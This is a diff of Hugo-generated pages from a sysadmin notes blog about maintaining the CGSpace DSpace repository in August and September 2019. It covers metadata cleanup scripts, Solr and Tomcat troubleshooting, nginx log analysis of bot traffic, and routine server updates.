@ -484,18 +484,18 @@ Please see the DSpace documentation for assistance.
<p>I might be able to use <a href="https://pypi.org/project/isbnlib/">isbnlib</a> to validate ISBNs in Python:</p>
</li>
</ul>
<pre><code>if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
print(&quot;Yes&quot;)
<pre tabindex="0"><code>if isbnlib.is_isbn10(&#39;9966-955-07-0&#39;) or isbnlib.is_isbn13(&#39;9966-955-07-0&#39;):
print(&#34;Yes&#34;)
else:
print(&quot;No&quot;)
print(&#34;No&#34;)
</code></pre><ul>
<li>Or with <a href="https://github.com/arthurdejong/python-stdnum">python-stdnum</a>:</li>
</ul>
<pre><code>from stdnum import isbn
<pre tabindex="0"><code>from stdnum import isbn
from stdnum import issn
isbn.validate('978-92-9043-389-7')
issn.validate('1020-3362')
isbn.validate(&#39;978-92-9043-389-7&#39;)
issn.validate(&#39;1020-3362&#39;)
</code></pre><h2 id="2019-07-26">2019-07-26</h2>
<ul>
<li>
@ -510,7 +510,7 @@ issn.validate('1020-3362')
<p>I figured out a GREL to trim spaces in multi-value cells without splitting them:</p>
</li>
</ul>
<pre><code>value.replace(/\s+\|\|/,&quot;||&quot;).replace(/\|\|\s+/,&quot;||&quot;)
<pre tabindex="0"><code>value.replace(/\s+\|\|/,&#34;||&#34;).replace(/\|\|\s+/,&#34;||&#34;)
</code></pre><ul>
<li>I whipped up a quick script using Python Pandas to do whitespace cleanup (a rough sketch of the approach is below)</li>
</ul>
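<ul>
<li>A minimal sketch of that Pandas whitespace cleanup (the file paths here are hypothetical placeholders, not the ones I actually used):</li>
</ul>
<pre tabindex="0"><code>import re

import pandas as pd

# Hypothetical input/output paths; point these at the real metadata export
df = pd.read_csv(&#39;/tmp/metadata-export.csv&#39;, dtype=str)

# Collapse runs of whitespace and strip leading/trailing spaces in one cell
def clean_whitespace(value):
    if pd.isna(value):
        return value
    return re.sub(r&#39;\s+&#39;, &#39; &#39;, value).strip()

# Apply the cleanup to every column of string values
for column in df.columns:
    df[column] = df[column].map(clean_whitespace)

df.to_csv(&#39;/tmp/metadata-export-cleaned.csv&#39;, index=False)
</code></pre>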
@ -554,15 +554,15 @@ issn.validate('1020-3362')
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -46,7 +46,7 @@ After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s luck
Run system updates on DSpace Test (linode19) and reboot it
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ Run system updates on DSpace Test (linode19) and reboot it
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -127,7 +127,7 @@ Run system updates on DSpace Test (linode19) and reboot it
<p class="blog-post-meta">
<time datetime="2019-08-03T12:39:51+03:00">Sat Aug 03, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -194,7 +194,7 @@ Run system updates on DSpace Test (linode19) and reboot it
</ul>
</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/^.*.*$/)),
isNotNull(value.match(/^.*é.*$/)),
isNotNull(value.match(/^.*á.*$/)),
@ -235,17 +235,17 @@ Run system updates on DSpace Test (linode19) and reboot it
</ul>
</li>
</ul>
<pre><code># /opt/certbot-auto renew --standalone --pre-hook &quot;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&quot; --post-hook &quot;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&quot;
<pre tabindex="0"><code># /opt/certbot-auto renew --standalone --pre-hook &#34;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&#34; --post-hook &#34;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&#34;
</code></pre><ul>
<li>It is important that the firewall starts back up before the Docker container or else Docker will complain about missing iptables chains</li>
<li>Also, I updated to the latest TLS Intermediate settings as appropriate for Ubuntu 18.04&rsquo;s <a href="https://ssl-config.mozilla.org/#server=nginx&amp;server-version=1.16.0&amp;config=intermediate&amp;openssl-version=1.1.0g&amp;hsts=false&amp;ocsp=false">OpenSSL 1.1.0g with nginx 1.16.0</a></li>
<li>Run all system updates on AReS dev server (linode20) and reboot it</li>
<li>Get a list of all PDFs from the Bioversity migration that fail to download and save them so I can try again with a different path in the URL:</li>
</ul>
<pre><code>$ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
$ grep -B1 &quot;Download failed&quot; /tmp/2019-08-08-download-pdfs.txt | grep &quot;Downloading&quot; | sed -e 's/&gt; Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
<pre tabindex="0"><code>$ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
$ ./generate-thumbnails.py -i /tmp/user-upload.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs2.txt
$ grep -B1 &quot;Download failed&quot; /tmp/2019-08-08-download-pdfs2.txt | grep &quot;Downloading&quot; | sed -e 's/&gt; Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs2.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
$ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs3.txt
</code></pre><ul>
<li>
@ -277,7 +277,7 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
</ul>
</li>
</ul>
<pre><code>proxy_set_header Host dev.ares.codeobia.com;
<pre tabindex="0"><code>proxy_set_header Host dev.ares.codeobia.com;
</code></pre><ul>
<li>Though I am really wondering why this happened now, because the configuration has been working for months&hellip;</li>
<li>Improve the output of the suspicious characters check in <a href="https://github.com/alanorth/csv-metadata-quality">csv-metadata-quality</a> script and tag version 0.2.0</li>
@ -329,7 +329,7 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
<ul>
<li>Create a test user on DSpace Test for Mohammad Salem to attempt depositing:</li>
</ul>
<pre><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p &#39;domoamaaa&#39;
</code></pre><ul>
<li>Create and merge a pull request (<a href="https://github.com/ilri/DSpace/pull/429">#429</a>) to add eleven new CCAFS Phase II Project Tags to CGSpace</li>
<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">Solr cores issue</a> last week, but they could not reproduce the issue
@ -339,13 +339,13 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
</li>
<li>Testing an import of 1,429 Bioversity items (metadata only) on my local development machine and got an error with Java memory after about 1,000 items:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
<pre tabindex="0"><code>$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
...
java.lang.OutOfMemoryError: GC overhead limit exceeded
</code></pre><ul>
<li>I increased the heap size to 1536m and tried again:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1536m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1536m&#34;
$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
</code></pre><ul>
<li>This time it succeeded, and using VisualVM I noticed that the import process used a maximum of 620MB of RAM</li>
@ -361,7 +361,7 @@ $ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
</ul>
</li>
</ul>
<pre><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
$ dspace metadata-import -f /tmp/bioversity1.csv -e blah@blah.com
$ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
</code></pre><ul>
@ -377,7 +377,7 @@ $ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
<li>Deploy Tomcat 7.0.96 and PostgreSQL JDBC 42.2.6 driver on CGSpace (linode18)</li>
<li>After restarting Tomcat one of the Solr statistics cores failed to start up:</li>
</ul>
<pre><code>statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>I decided to run all system updates on the server and reboot it</li>
<li>After reboot the statistics-2018 core failed to load so I restarted <code>tomcat7</code> again</li>
@ -393,7 +393,7 @@ $ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
</ul>
</li>
</ul>
<pre><code>import os
<pre tabindex="0"><code>import os
return os.path.basename(value)
</code></pre><ul>
@ -429,7 +429,7 @@ return os.path.basename(value)
</ul>
</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
</code></pre><ul>
<li>Apply the corrections on CGSpace and DSpace Test
<ul>
@ -437,7 +437,7 @@ return os.path.basename(value)
</ul>
</li>
</ul>
<pre><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 81m47.057s
user 8m5.265s
@ -478,21 +478,21 @@ sys 2m24.715s
</ul>
</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
COPY 65597
</code></pre><ul>
<li>Then I created a new CSV with two author columns (edit title of second column after):</li>
</ul>
<pre><code>$ csvcut -c dc.contributor.author,dc.contributor.author /tmp/2019-08-28-all-authors.csv &gt; /tmp/all-authors.csv
<pre tabindex="0"><code>$ csvcut -c dc.contributor.author,dc.contributor.author /tmp/2019-08-28-all-authors.csv &gt; /tmp/all-authors.csv
</code></pre><ul>
<li>Then I ran my script on the new CSV, skipping one of the author columns:</li>
</ul>
<pre><code>$ csv-metadata-quality -u -i /tmp/all-authors.csv -o /tmp/authors.csv -x dc.contributor.author
<pre tabindex="0"><code>$ csv-metadata-quality -u -i /tmp/all-authors.csv -o /tmp/authors.csv -x dc.contributor.author
</code></pre><ul>
<li>This fixed a bunch of issues with spaces, commas, unnecessary Unicode characters, etc</li>
<li>Then I ran the corrections on my test server and there were 185 of them!</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correctauthor
</code></pre><ul>
<li>I very well might run these on CGSpace soon&hellip;</li>
</ul>
@ -506,7 +506,7 @@ COPY 65597
</ul>
</li>
</ul>
<pre><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &quot;*.xsl&quot; -exec ./cgcore-xsl-replacements.sed {} \;
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &#34;*.xsl&#34; -exec ./cgcore-xsl-replacements.sed {} \;
</code></pre><ul>
<li>I think I got everything in the XMLUI themes, but there may be some things I should check once I get a deployment up and running:
<ul>
@ -526,7 +526,7 @@ COPY 65597
</ul>
</li>
</ul>
<pre><code>&quot;handles&quot;:[&quot;10986/30568&quot;,&quot;10568/97825&quot;],&quot;handle&quot;:&quot;10986/30568&quot;
<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10986/30568&#34;,&#34;10568/97825&#34;],&#34;handle&#34;:&#34;10986/30568&#34;
</code></pre><ul>
<li>So this is the same issue we had before, where Altmetric <em>knows</em> this Handle is associated with a DOI that has a score, but the client-side JavaScript code doesn&rsquo;t show it because it seems to be a secondary handle or something</li>
</ul>
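<ul>
<li>One way to double check what Altmetric returns for each of the two handles is a small script like the following (a rough sketch against Altmetric&rsquo;s public v1 handle endpoint, which should not require an API key for basic lookups; the field names are taken from the JSON above):</li>
</ul>
<pre tabindex="0"><code>import requests

# Query Altmetric&#39;s v1 handle endpoint for both handles of the item
for handle in (&#39;10986/30568&#39;, &#39;10568/97825&#39;):
    r = requests.get(f&#39;https://api.altmetric.com/v1/handle/{handle}&#39;)
    if r.status_code == 200:
        data = r.json()
        print(handle, data.get(&#39;score&#39;), data.get(&#39;handles&#39;))
    else:
        print(handle, &#39;no data or rate limited:&#39;, r.status_code)
</code></pre>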
@ -535,7 +535,7 @@ COPY 65597
<li>Run system updates on DSpace Test (linode19) and reboot the server</li>
<li>Run the author fixes on DSpace Test and CGSpace and start a full Discovery re-index:</li>
</ul>
<pre><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 90m47.967s
user 8m12.826s
@ -573,15 +573,15 @@ sys 2m27.496s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -12,7 +12,7 @@
Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -23,7 +23,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -49,7 +49,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -60,7 +60,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -72,7 +72,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
7249 2a01:7e00::f03c:91ff:fe18:7396
9124 45.5.186.2
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -102,12 +102,12 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -153,7 +153,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<p class="blog-post-meta">
<time datetime="2019-09-01T10:17:51+03:00">Sun Sep 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -163,7 +163,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -174,7 +174,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -189,18 +189,18 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
<li><code>3.94.211.189</code> is MauiBot, and most of its requests are to Discovery and get rate limited with HTTP 503</li>
<li><code>163.172.71.23</code> is some IP on Online SAS in France and its user agent is:</li>
</ul>
<pre><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
<pre tabindex="0"><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
</code></pre><ul>
<li>It actually got mostly HTTP 200 responses:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | awk &#39;{print $9}&#39; | sort | uniq -c
1775 200
703 499
72 503
</code></pre><ul>
<li>And it was mostly requesting Discover pages:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | grep 163.172.71.23 | grep -o -E &quot;(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c
2350 discover
71 handle
</code></pre><ul>
@ -279,16 +279,16 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
</ul>
</li>
</ul>
<pre><code>2019-09-15 15:32:18,137 WARN org.apache.cocoon.components.xslt.TraxErrorListener - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
<pre tabindex="0"><code>2019-09-15 15:32:18,137 WARN org.apache.cocoon.components.xslt.TraxErrorListener - Can not load requested doc: unknown protocol: cocoon at jndi:/localhost/themes/CIAT/xsl/../../0_CGIAR/xsl//aspect/artifactbrowser/common.xsl:141:90
</code></pre><ul>
<li>Around the same time I see the following in the DSpace log:</li>
</ul>
<pre><code>2019-09-15 15:32:18,079 INFO org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644
2019-09-15 15:32:18,135 WARN org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&quot;METSRIGHTS&quot;
<pre tabindex="0"><code>2019-09-15 15:32:18,079 INFO org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644
2019-09-15 15:32:18,135 WARN org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name=&#34;METSRIGHTS&#34;
</code></pre><ul>
<li>I see a lot of these errors today, but not earlier this month:</li>
</ul>
<pre><code># grep -c 'Cannot find named plugin' dspace.log.2019-09-*
<pre tabindex="0"><code># grep -c &#39;Cannot find named plugin&#39; dspace.log.2019-09-*
dspace.log.2019-09-01:0
dspace.log.2019-09-02:0
dspace.log.2019-09-03:0
@ -307,9 +307,9 @@ dspace.log.2019-09-15:808
</code></pre><ul>
<li>Something must have happened when I restarted Tomcat a few hours ago, because earlier in the DSpace log I see a bunch of errors like this:</li>
</ul>
<pre><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.METSRightsCrosswalk&quot;, name=&quot;METSRIGHTS&quot;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.OREDisseminationCrosswalk&quot;, name=&quot;ore&quot;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&quot;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&quot;, name=&quot;dim&quot;
<pre tabindex="0"><code>2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.METSRightsCrosswalk&#34;, name=&#34;METSRIGHTS&#34;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.OREDisseminationCrosswalk&#34;, name=&#34;ore&#34;
2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class=&#34;org.dspace.content.crosswalk.DIMDisseminationCrosswalk&#34;, name=&#34;dim&#34;
</code></pre><ul>
<li>I restarted Tomcat and the item views came back, but then the Solr statistics cores didn&rsquo;t all load properly
<ul>
@ -321,14 +321,14 @@ dspace.log.2019-09-15:808
<ul>
<li>For some reason my podman PostgreSQL container isn&rsquo;t working so I had to use Docker to re-create it for my testing work today:</li>
</ul>
<pre><code># docker pull docker.io/library/postgres:9.6-alpine
<pre tabindex="0"><code># docker pull docker.io/library/postgres:9.6-alpine
# docker volume create dspacedb_data
# docker run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
